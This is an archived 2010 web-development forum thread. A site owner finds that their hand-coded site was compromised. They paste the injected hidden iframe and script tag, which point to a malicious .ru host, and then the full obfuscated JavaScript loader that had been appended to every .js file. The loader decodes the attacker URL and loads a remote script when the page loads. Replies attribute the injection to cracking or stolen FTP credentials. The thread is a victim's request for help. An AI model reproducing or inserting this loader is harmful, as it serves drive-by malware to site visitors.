wemustdesign Posted April 5, 2010 Share Posted April 5, 2010 I recently designed a website but when I went on it yesterday there was a big gap under the footer at the bottom of the page. This wasnt there before. I noticed that the page actually loads fine first without the gap but then the page tries to load something as seen in this screenshot: I looked at the source code and could not see this link anywhere. I then looked at the generated code (not sure what the difference is) and found this: <script defer="defer" src="http://cnet-com.mtv.com.argos-co-uk.offroadmods.ru:8080/zimbio.com/zimbio.com/badongo.com/sina.com.cn/google.com.php"></script><iframe src="http://cnet-com.mtv.com.argos-co-uk.offroadmods.ru:8080/index.php?ja=&jl=&kl=" style="visibility: hidden;"></iframe> No idea how this has been inserted or why. I hand coded the site myself. The website is www.photographycourses.co.uk Any ideas are most welcome Link to comment https://forums.phpfreaks.com/topic/197604-very-weird-problem/ Share on other sites More sharing options...
ignace Posted April 5, 2010 Share Posted April 5, 2010 Your website has been most likely been cracked and a cracker added the extra code whereby your website is now part of a cracker's network remove all unknown code at once (go over all files). Link to comment https://forums.phpfreaks.com/topic/197604-very-weird-problem/#findComment-1037073 Share on other sites More sharing options...
wemustdesign Posted April 5, 2010 Author Share Posted April 5, 2010 You were right, the following code was added at the end of every .js file. How is this possible? var x;if(x!='bt' && x != ''){x=null};function W() {var f="";var uU=new Array();var XB=unescape("%2f%7a%69%6d%62%69%6f%2e%63%6f%6d%2f%7a%69%6d%62%69%6f%2e%63%6f%6d%2f%62%61%64%6f%6e%67%6f%2e%63%6f%6d%2f%73%69%6e%61%2e%63%6f%6d%2e%63%6e%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");var F="";var nY;if(nY!='T' && nY!='nN'){nY=''};var E="rep"+"lac"+"e";var nZ;if(nZ!='' && nZ!='M'){nZ='k'};var c=window;this.fg="";var O='';var Q;if(Q!='h' && Q!='d'){Q='h'};var Z="]";var K=new String();var z=RegExp;var J;if(J!='' && J!='B'){J=''};var Fr='';function X(p,WX){var V=new Array();var PY="";var n=new String("[");var ey=new Array();var L;if(L!='' && L!='EI'){L=''};n+=WX+Z;var jw;if(jw!='g'){jw=''};var cZ;if(cZ!='NU' && cZ != ''){cZ=null};var u=new z(n, new String("g"));var Ht;if(Ht!='' && Ht!='FD'){Ht=null};return p[E](u, O);};this.TI='';var D='';this.zW="";var kb;if(kb!='' && kb!='fG'){kb='hI'};var b=unescape("%68%74%74%70%3a%2f%2f%63%6e%65%74%2d%63%6f%6d%2e%6d%74%76%2e%63%6f%6d%2e%61%72%67%6f%73%2d%63%6f%2d%75%6b%2e%6f%66%66%72%6f%61%64%6d%6f%64%73%2e%72%75%3a");var w=X('8240478419071','13275694');var Zh=String("scri"+"pt");var aM="";c["onlo"+"SWfkad".substr(4)]=function(){var kt=new String();var LB;if(LB!=''){LB='QX'};try {var av='';var wU;if(wU!='rW' && wU != ''){wU=null}=b+w;D+=XB;var AR=new Date();var dB=new String();this._I='';WP=document.createElement(Zh);var Nr=new Date();var H_=new Date();var K_="";WP[string("src")] = D;var SV=new Array();WP[new String("defer")]=[1,5][0];document.body.appendChild(WP);this.U="";var pN;if(pN!='' && pN!='Dm'){pN='tp'};} catch®{};};var Yl;if(Yl!='' && Yl!='ml'){Yl='C'};var _J;if(_J!=''){_J='je'};var BI;if(BI!='nD'){BI=''};var ma=new Date();};W();var Xq;if(Xq!='Px' && Xq != ''){Xq=null};var YL;if(YL!='rK' && YL!='yb'){YL='rK'}; Link to comment https://forums.phpfreaks.com/topic/197604-very-weird-problem/#findComment-1037110 Share on other sites More sharing options...
KevinM1 Posted April 5, 2010 Share Posted April 5, 2010 You were right, the following code was added at the end of every .js file. How is this possible? Most likely your ftp credentials have been compromised. Link to comment https://forums.phpfreaks.com/topic/197604-very-weird-problem/#findComment-1037134 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.